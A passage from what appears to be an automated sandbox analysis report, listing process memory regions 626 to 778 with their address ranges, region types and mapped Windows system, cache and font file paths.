0x2751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 626 start_va = 0x2760000 end_va = 0x2763fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 627 start_va = 0x2770000 end_va = 0x2776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 628 start_va = 0x2800000 end_va = 0x2847fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 629 start_va = 0x2850000 end_va = 0x2853fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 630 start_va = 0x2860000 end_va = 0x2871fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db") Region: id = 631 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 632 start_va = 0x2890000 end_va = 0x2890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 633 start_va = 0x28a0000 end_va = 0x3afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 634 start_va = 0x3b00000 end_va = 0x3b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 635 start_va = 0x3b10000 end_va = 0x3c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 636 start_va = 0x3c10000 end_va = 0x3c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 637 start_va = 0x3c20000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c20000" filename = "" Region: id = 638 start_va = 0x3c30000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c30000" filename = "" Region: id = 639 start_va = 0x3c40000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c40000" filename = "" Region: id = 640 start_va = 0x3c50000 end_va = 0x3c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 641 start_va = 0x3c60000 end_va = 0x3c60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 642 start_va = 0x3c70000 end_va = 0x3c73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 643 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c80000" filename = "" Region: id = 644 start_va = 0x3c90000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 645 start_va = 0x3d90000 end_va = 0x3d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 646 start_va = 0x3da0000 end_va = 0x3da0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 647 start_va = 0x3db0000 end_va = 0x3db0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 648 start_va = 0x3dc0000 end_va = 0x3e06fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dc0000" filename = "" Region: id = 649 start_va = 0x3e10000 end_va = 0x3e11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 650 start_va = 0x3e20000 end_va = 0x3e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 651 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 652 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 653 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 654 start_va = 0x3e60000 end_va = 0x3e6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 655 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 656 start_va = 0x3ef0000 end_va = 0x3ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ef0000" filename = "" Region: id = 657 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 658 start_va = 0x4080000 end_va = 0x4080fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004080000" filename = "" Region: id = 659 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 660 start_va = 0x4120000 end_va = 0x4120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004120000" filename = "" Region: id = 661 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 662 start_va = 0x41a0000 end_va = 0x41a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 663 start_va = 0x41b0000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 664 start_va = 0x4230000 end_va = 0x4230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004230000" filename = "" Region: id = 665 start_va = 0x4240000 end_va = 0x4240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 666 start_va = 0x4250000 end_va = 0x4288fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 667 start_va = 0x4290000 end_va = 0x429ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 668 start_va = 0x42a0000 end_va = 0x42a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 669 start_va = 0x4330000 end_va = 0x4337fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 670 start_va = 0x4340000 end_va = 0x4360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellcomponents.pri" filename = "\\Windows\\SystemResources\\ShellComponents\\ShellComponents.pri" (normalized: "c:\\windows\\systemresources\\shellcomponents\\shellcomponents.pri") Region: id = 671 start_va = 0x4370000 end_va = 0x4378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 672 start_va = 0x4380000 end_va = 0x4388fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 673 start_va = 0x4390000 end_va = 0x4390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 674 start_va = 0x43a0000 end_va = 0x43a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043a0000" filename = "" Region: id = 675 start_va = 0x43b0000 end_va = 0x43b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043b0000" filename = "" Region: id = 676 start_va = 0x43c0000 end_va = 0x43c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 677 start_va = 0x43d0000 end_va = 0x4418fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 678 start_va = 0x4420000 end_va = 0x4423fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 679 start_va = 0x4430000 end_va = 0x44cbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 680 start_va = 0x44d0000 end_va = 0x44dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 681 start_va = 0x44e0000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 682 start_va = 0x4560000 end_va = 0x4565fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 683 start_va = 0x4570000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 684 start_va = 0x45f0000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 685 start_va = 0x4670000 end_va = 0x4670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 686 start_va = 0x4700000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 687 start_va = 0x4780000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 688 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 689 start_va = 0x4880000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 690 start_va = 0x4910000 end_va = 0x4911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 691 start_va = 0x4920000 end_va = 0x4920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 692 start_va = 0x4930000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 693 start_va = 0x49c0000 end_va = 0x49c7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 694 start_va = 0x49e0000 end_va = 0x49e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 695 start_va = 0x49f0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 696 start_va = 0x4a00000 end_va = 0x4a00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 697 start_va = 0x4a90000 end_va = 0x4b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 698 start_va = 0x4b10000 end_va = 0x4b10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 699 start_va = 0x4b20000 end_va = 0x4b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 700 start_va = 0x4b30000 end_va = 0x5021fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 701 start_va = 0x5030000 end_va = 0x5031fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005030000" filename = "" Region: id = 702 start_va = 0x5040000 end_va = 0x5040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 703 start_va = 0x5050000 end_va = 0x50cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 704 start_va = 0x50d0000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 705 start_va = 0x5150000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 706 start_va = 0x51d0000 end_va = 0x51f5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "zoneinfo64.res" filename = "\\Windows\\Globalization\\ICU\\zoneinfo64.res" (normalized: "c:\\windows\\globalization\\icu\\zoneinfo64.res") Region: id = 707 start_va = 0x5200000 end_va = 0x5201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005200000" filename = "" Region: id = 708 start_va = 0x5210000 end_va = 0x5213fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 709 start_va = 0x5220000 end_va = 0x5220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005220000" filename = "" Region: id = 710 start_va = 0x5230000 end_va = 0x5237fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 711 start_va = 0x5240000 end_va = 0x5243fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 712 start_va = 0x5250000 end_va = 0x5257fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 713 start_va = 0x5260000 end_va = 0x5260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 714 start_va = 0x5270000 end_va = 0x527ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005270000" filename = "" Region: id = 715 start_va = 0x52a0000 end_va = 0x52b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "3968321142.pri" filename = "\\Windows\\rescache\\_merged\\2457103279\\3968321142.pri" (normalized: "c:\\windows\\rescache\\_merged\\2457103279\\3968321142.pri") Region: id = 716 start_va = 0x52c0000 end_va = 0x52c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 717 start_va = 0x52d0000 end_va = 0x52d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 718 start_va = 0x52e0000 end_va = 0x52e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052e0000" filename = "" Region: id = 719 start_va = 0x52f0000 end_va = 0x52f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000052f0000" filename = "" Region: id = 720 start_va = 0x5300000 end_va = 0x5306fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 721 start_va = 0x5310000 end_va = 0x540ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 722 start_va = 0x5410000 end_va = 0x548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 723 start_va = 0x54b0000 end_va = 0x54b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054b0000" filename = "" Region: id = 724 start_va = 0x54c0000 end_va = 0x54c7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 725 start_va = 0x54d0000 end_va = 0x54d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 726 start_va = 0x54f0000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 727 start_va = 0x5530000 end_va = 0x562ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 728 start_va = 0x5680000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005680000" filename = "" Region: id = 729 start_va = 0x5880000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 730 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 731 start_va = 0x5a80000 end_va = 0x5a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 732 start_va = 0x5c00000 end_va = 0x5c47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 733 start_va = 0x5cd0000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cd0000" filename = "" Region: id = 734 start_va = 0x64d0000 end_va = 0x654ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 735 start_va = 0x6550000 end_va = 0x65cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006550000" filename = "" Region: id = 736 start_va = 0x65d0000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065d0000" filename = "" Region: id = 737 start_va = 0x6650000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 738 start_va = 0x66d0000 end_va = 0x674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066d0000" filename = "" Region: id = 739 start_va = 0x6750000 end_va = 0x67cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 740 start_va = 0x67d0000 end_va = 0x690efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 741 start_va = 0x6910000 end_va = 0x6910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006910000" filename = "" Region: id = 742 start_va = 0x6920000 end_va = 0x6972fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 743 start_va = 0x6980000 end_va = 0x6b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006980000" filename = "" Region: id = 744 start_va = 0x6b80000 end_va = 0x70fafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "prm0009.dll" filename = "\\Windows\\System32\\prm0009.dll" (normalized: "c:\\windows\\system32\\prm0009.dll") Region: id = 745 start_va = 0x7100000 end_va = 0x717ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 746 start_va = 0x7180000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007180000" filename = "" Region: id = 747 start_va = 0x7200000 end_va = 0x727ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 748 start_va = 0x7280000 end_va = 0x927ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007280000" filename = "" Region: id = 749 start_va = 0x9280000 end_va = 0x92fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009280000" filename = "" Region: id = 750 start_va = 0x9300000 end_va = 0x96fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009300000" filename = "" Region: id = 751 start_va = 0x9700000 end_va = 0x97fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009700000" filename = "" Region: id = 752 start_va = 0x9980000 end_va = 0x9980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009980000" filename = "" Region: id = 753 start_va = 0x9990000 end_va = 0x9a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009990000" filename = "" Region: id = 754 start_va = 0x9b10000 end_va = 0x9c0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 755 start_va = 0x9c10000 end_va = 0x9da1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.ui.shellcommon.pri" filename = "\\Windows\\SystemResources\\Windows.UI.ShellCommon\\Windows.UI.ShellCommon.pri" (normalized: "c:\\windows\\systemresources\\windows.ui.shellcommon\\windows.ui.shellcommon.pri") Region: id = 756 start_va = 0x9db0000 end_va = 0x9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009db0000" filename = "" Region: id = 757 start_va = 0x9e30000 end_va = 0x9eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e30000" filename = "" Region: id = 758 start_va = 0x9eb0000 end_va = 0x9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009eb0000" filename = "" Region: id = 759 start_va = 0x9f30000 end_va = 0x9fbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mun" filename = "\\Windows\\SystemResources\\SndVolSSO.dll.mun" (normalized: "c:\\windows\\systemresources\\sndvolsso.dll.mun") Region: id = 760 start_va = 0x9fc0000 end_va = 0xa0bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 761 start_va = 0xa0c0000 end_va = 0xa13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0c0000" filename = "" Region: id = 762 start_va = 0xa140000 end_va = 0xa1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a140000" filename = "" Region: id = 763 start_va = 0xa1c0000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1c0000" filename = "" Region: id = 764 start_va = 0xa240000 end_va = 0xa33ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 765 start_va = 0xa340000 end_va = 0xa3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a340000" filename = "" Region: id = 766 start_va = 0xa3c0000 end_va = 0xa43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3c0000" filename = "" Region: id = 767 start_va = 0xa440000 end_va = 0xa4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a440000" filename = "" Region: id = 768 start_va = 0xa540000 end_va = 0xa5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a540000" filename = "" Region: id = 769 start_va = 0xa5c0000 end_va = 0xa62bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a5c0000" filename = "" Region: id = 770 start_va = 0xa640000 end_va = 0xa6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a640000" filename = "" Region: id = 771 start_va = 0xa6c0000 end_va = 0xa73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a6c0000" filename = "" Region: id = 772 start_va = 0xa740000 end_va = 0xb73ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 773 start_va = 0xb740000 end_va = 0xbf3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-245394380-2276627025-4024548581-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-245394380-2276627025-4024548581-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-245394380-2276627025-4024548581-1000.dat") Region: id = 774 start_va = 0xbf40000 end_va = 0xc029fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 775 start_va = 0xc030000 end_va = 0xc0defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.ui.xaml.resources.19h1.dll" filename = "\\Windows\\System32\\Windows.UI.Xaml.Resources.19h1.dll" (normalized: "c:\\windows\\system32\\windows.ui.xaml.resources.19h1.dll") Region: id = 776 start_va = 0xc0e0000 end_va = 0xc1dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 777 start_va = 0xc1e0000 end_va = 0xc2dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 778 start_va = 0xc2e0000 end_va = 0xc3dffff monitored = 1 entry_point = 0x0 